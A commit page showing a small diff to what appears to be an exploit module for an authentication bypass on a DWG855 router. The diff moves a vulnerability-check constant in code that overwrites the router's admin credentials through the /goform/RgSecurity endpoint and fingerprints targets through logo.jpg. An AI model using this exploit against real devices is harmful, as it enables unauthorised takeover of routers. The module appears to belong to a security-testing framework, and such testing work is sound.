Commit f8b4aa2b by 0BuRner Committed by GitHub

Update dwg855_authbypass.py

parent 761cf45f
...@@ -35,6 +35,9 @@ class Exploit(exploits.Exploit): ...@@ -35,6 +35,9 @@ class Exploit(exploits.Exploit):
nuser = exploits.Option('ruser', 'Overwrite old user with.. ') nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
npass = exploits.Option('rpass', 'Overwrite old password with.. ') npass = exploits.Option('rpass', 'Overwrite old password with.. ')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self): def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass) print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
...@@ -54,9 +57,6 @@ class Exploit(exploits.Exploit): ...@@ -54,9 +57,6 @@ class Exploit(exploits.Exploit):
def check(self): def check(self):
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port)) url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent, headers = {'User-Agent': user_agent,
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment